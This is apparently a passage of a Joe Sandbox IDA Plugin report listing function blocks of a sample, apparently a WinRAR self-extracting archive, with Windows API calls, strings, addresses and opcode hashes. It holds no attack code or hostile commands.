                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 3d03d6aa32a09f5c2743c19450a90728e1804911a228bd6935f1b5ef4f93ab46
                • Instruction ID: 2e8d287e2758e89ff48da1984464bad4f5f4b5ed17011d86f761a34314c890a0
                • Opcode Fuzzy Hash: 3d03d6aa32a09f5c2743c19450a90728e1804911a228bd6935f1b5ef4f93ab46
                • Instruction Fuzzy Hash: C6316B32600206DFEF20BBB8D945B5A73E9FF02310F198469E449D7A51DE32FC409A25
                APIs
                • GetWindow.USER32(?,00000005), ref: 0088CD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 0088CD7D
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 0088CD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088CDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0088CDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088CDED
                • DeleteObject.GDI32(00000000), ref: 0088CDF4
                • GetWindow.USER32(00000000,00000002), ref: 0088CDFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: 90ae423857ca62ed4566808f94aa9089dee2e91f64ea58428d84c7c2c36d5643
                • Instruction ID: a6a57c68e1436f9bd374b952f35153d75dead5abb3d88147aea6278a4218dcc2
                • Opcode Fuzzy Hash: 90ae423857ca62ed4566808f94aa9089dee2e91f64ea58428d84c7c2c36d5643
                • Instruction Fuzzy Hash: E01136321427117BE7217B24DC0AFAF775CFF61741F008122FA42E10A2DA748D1687B5
                APIs
                • _free.LIBCMT ref: 00898EC5
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 00898ED1
                • _free.LIBCMT ref: 00898EDC
                • _free.LIBCMT ref: 00898EE7
                • _free.LIBCMT ref: 00898EF2
                • _free.LIBCMT ref: 00898EFD
                • _free.LIBCMT ref: 00898F08
                • _free.LIBCMT ref: 00898F13
                • _free.LIBCMT ref: 00898F1E
                • _free.LIBCMT ref: 00898F2C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 31ba13765f33591e688dcb672e8970939a4277f49bb1b859a1bee7cb5e3e8cea
                • Instruction ID: 3cbce6aa2585942c4f71ab4eb66611be6a95dfed39507a5313a91fa2a5dc9ca3
                • Opcode Fuzzy Hash: 31ba13765f33591e688dcb672e8970939a4277f49bb1b859a1bee7cb5e3e8cea
                • Instruction Fuzzy Hash: A811A77650010EEFCF11FF58C842CDA3B65FF05350B5A40E5BA088B926DA31EA519F85
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: 056ac3677a48bcf2173da5d6fe48276d392d0bae4beb57da9e149844e870077b
                • Instruction ID: f12dd56bff89298d668f268ee763db3c42a23ab00889220e1aefab8c93a3149b
                • Opcode Fuzzy Hash: 056ac3677a48bcf2173da5d6fe48276d392d0bae4beb57da9e149844e870077b
                • Instruction Fuzzy Hash: 2CF117716042405BDB15EE2888D5BEA7799FFA0340F08C56DF98DCB29BDA24D948C7A3
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088AD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0088AD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0088AD60
                • SetWindowTextW.USER32(?,?), ref: 0088AD71
                • GetDlgItem.USER32(?,00000065), ref: 0088AD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0088AD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0088ADA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: adb2a99a12fed1d19e1f76e55f03e27e49b6fb2638e43a7af1a71a8e74b745dc
                • Instruction ID: af837210efeb34fcb561f97684a313a7dece29750de503ed1f07ea7758675aac
                • Opcode Fuzzy Hash: adb2a99a12fed1d19e1f76e55f03e27e49b6fb2638e43a7af1a71a8e74b745dc
                • Instruction Fuzzy Hash: 0221AD32241205BBE6257B25EC49E3B3B7CFB5AB46F014116F604E24E0DA66AD00E732
                APIs
                • __EH_prolog.LIBCMT ref: 00879448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0087946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0087948A
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • _swprintf.LIBCMT ref: 00879526
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • MoveFileW.KERNEL32(?,?), ref: 00879595
                • MoveFileW.KERNEL32(?,?), ref: 008795D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: 99e8be2e7e240b6fb825904a6eb1821839897998967397f39172eff37e9077d9
                • Instruction ID: bba8aa9fd60799563f617b3b3f874f13866785f1c034e32d7d8cac53cdbca219
                • Opcode Fuzzy Hash: 99e8be2e7e240b6fb825904a6eb1821839897998967397f39172eff37e9077d9
                • Instruction Fuzzy Hash: 7A414D71900258A6DF20EBA88C85EDA737CFF51380F0485E5F59DE304AEB74CB898B65
                APIs
                • __aulldiv.LIBCMT ref: 00880A9D
                  • Part of subcall function 0087ACF5: GetVersionExW.KERNEL32(?), ref: 0087AD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00880AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00880AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00880AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00880B3D
                • __aullrem.LIBCMT ref: 00880BCB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 20d38c8ec319e39e2b2083c19ad3f6bf7e6e2f11dc9a4a4c01edfdf260d3a8f7
                • Instruction ID: 0b9a98cce58e4aedda9264c874cd0f6a1b28664cff8e6161661872d8eea18c2e
                • Opcode Fuzzy Hash: 20d38c8ec319e39e2b2083c19ad3f6bf7e6e2f11dc9a4a4c01edfdf260d3a8f7
                • Instruction Fuzzy Hash: F64116B1408306AFD354DF64C88096BBBE8FF88714F004A2EF596D2650E778E549CB52
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0089F5A2,?,00000000,?,00000000,00000000), ref: 0089EE6F
                • __fassign.LIBCMT ref: 0089EEEA
                • __fassign.LIBCMT ref: 0089EF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0089EF2B
                • WriteFile.KERNEL32(?,?,00000000,0089F5A2,00000000,?,?,?,?,?,?,?,?,?,0089F5A2,?), ref: 0089EF4A
                • WriteFile.KERNEL32(?,?,00000001,0089F5A2,00000000,?,?,?,?,?,?,?,?,?,0089F5A2,?), ref: 0089EF83
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: eed37f78e287899ea68ca7b26b7eeeca96103fb34df926f14853bb67c90c5146
                • Instruction ID: 9e8a96c3595c7aa24143c9be151d97d8fcde28465bfe90904336f7ec5484987d
                • Opcode Fuzzy Hash: eed37f78e287899ea68ca7b26b7eeeca96103fb34df926f14853bb67c90c5146
                • Instruction Fuzzy Hash: 8051B170A00209AFDF10DFA8DC45AEEBBF9FF09300F18455AE555E7691DB309940CB61
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 0088C54A
                • _swprintf.LIBCMT ref: 0088C57E
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • SetDlgItemTextW.USER32(?,00000066,008B946A), ref: 0088C59E
                • _wcschr.LIBVCRUNTIME ref: 0088C5D1
                • EndDialog.USER32(?,00000001), ref: 0088C6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 62520cb41402906f74c6544f893079ca842dce7b7ee944d9638e6ff83d7be0d4
                • Instruction ID: 2df4beda12f77391977634830dc5df6639cc1554e3e5dca83f94d7ccf90b8dd5
                • Opcode Fuzzy Hash: 62520cb41402906f74c6544f893079ca842dce7b7ee944d9638e6ff83d7be0d4
                • Instruction Fuzzy Hash: AA41C171D00618AADF26EBA4DC45EEA77BDFF18305F0080A6E509E7065E7719BC4CB61
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00888F38
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00888F59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 3286310052-4209811716
                • Opcode ID: 26d18ecaf94605f856e77563b2970e0e0c8c0faf1281214ac46a4b55f1b58a28
                • Instruction ID: 1b3c66dbf1f36bc7762a45f9061ce318c0bfda738bdb31a6be4f85bcb0a35957
                • Opcode Fuzzy Hash: 26d18ecaf94605f856e77563b2970e0e0c8c0faf1281214ac46a4b55f1b58a28
                • Instruction Fuzzy Hash: D7314E31504311BBEB25BB289C02FAF7758FF86724F54011AF911D61C1EF649A0983A6
                APIs
                • ShowWindow.USER32(?,00000000), ref: 0088964E
                • GetWindowRect.USER32(?,00000000), ref: 00889693
                • ShowWindow.USER32(?,00000005,00000000), ref: 0088972A
                • SetWindowTextW.USER32(?,00000000), ref: 00889732
                • ShowWindow.USER32(00000000,00000005), ref: 00889748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: b07a161361f246d324f4f282218b90d3a271ab6417548d9744d6e2b38e99e631
                • Instruction ID: c1417bb6347e2a86b204122c42ea69e06ee106c90962f87c6b6564531f8b8c58
                • Opcode Fuzzy Hash: b07a161361f246d324f4f282218b90d3a271ab6417548d9744d6e2b38e99e631
                • Instruction Fuzzy Hash: 1931AD31005214EFCF11AF64DC48B6B7BA8FF58711F09865AFA89DA162DB34E905CB61
                APIs
                  • Part of subcall function 0089BF79: _free.LIBCMT ref: 0089BFA2
                • _free.LIBCMT ref: 0089C003
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089C00E
                • _free.LIBCMT ref: 0089C019
                • _free.LIBCMT ref: 0089C06D
                • _free.LIBCMT ref: 0089C078
                • _free.LIBCMT ref: 0089C083
                • _free.LIBCMT ref: 0089C08E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: 3856fabac75b79380fb68a497fe74c8f646ad68b4923e174b818ade47f39b3bb
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: 7F114D31540B05FADE20BBB4DD4AFCBB799FF01700F488864B29DE6852DF65F9048A92
                APIs
                • GetLastError.KERNEL32(?,?,008920C1,0088FB12), ref: 008920D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008920E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008920FF
                • SetLastError.KERNEL32(00000000,?,008920C1,0088FB12), ref: 00892151
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: d593ded6ae5ccf4059e2a86ca51e54aa90526fe5b12aeccc87b2b845b3610146
                • Instruction ID: 6f057630e8c7d301ad2bec89b4788c55ed62ae4dce0712b7e38392bc4c171983
                • Opcode Fuzzy Hash: d593ded6ae5ccf4059e2a86ca51e54aa90526fe5b12aeccc87b2b845b3610146
                • Instruction Fuzzy Hash: D70188321497127EBF543BB97C855163A44FB237747290B29F210D55F1FE515C11A245
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 94eb6eb496f5a97d4798ef8d786e978a730e7239039ffd481e565fbd1d70b511
                • Instruction ID: 3382ad424327cbba90a1fe94d2727d6aec9b4d3426ef6d1ce124f2d7045dc3ca
                • Opcode Fuzzy Hash: 94eb6eb496f5a97d4798ef8d786e978a730e7239039ffd481e565fbd1d70b511
                • Instruction Fuzzy Hash: 730128726527229B5F307FB45C817AA67D5FB43316720123BE601D3380EA91CC82DBA0
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880D0D
                  • Part of subcall function 0087ACF5: GetVersionExW.KERNEL32(?), ref: 0087AD1A
                • LocalFileTimeToFileTime.KERNEL32(?,00880CB8), ref: 00880D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00880D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00880D56
                • SystemTimeToFileTime.KERNEL32(?,00880CB8), ref: 00880D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880D72
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 3a9c666c3c3802f7c8ec730f80ec22fa91716317a4edcf418f5eb6a212e41dc8
                • Instruction ID: 0c88810e38e865b5e93574969fa73aa5e7878e9ce50d9d6ccbd3295b76c111ee
                • Opcode Fuzzy Hash: 3a9c666c3c3802f7c8ec730f80ec22fa91716317a4edcf418f5eb6a212e41dc8
                • Instruction Fuzzy Hash: A231E97A90020AEBCB00EFE4C8859EFBBBCFF58700B04456AE955E3610E7309A45CB65
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
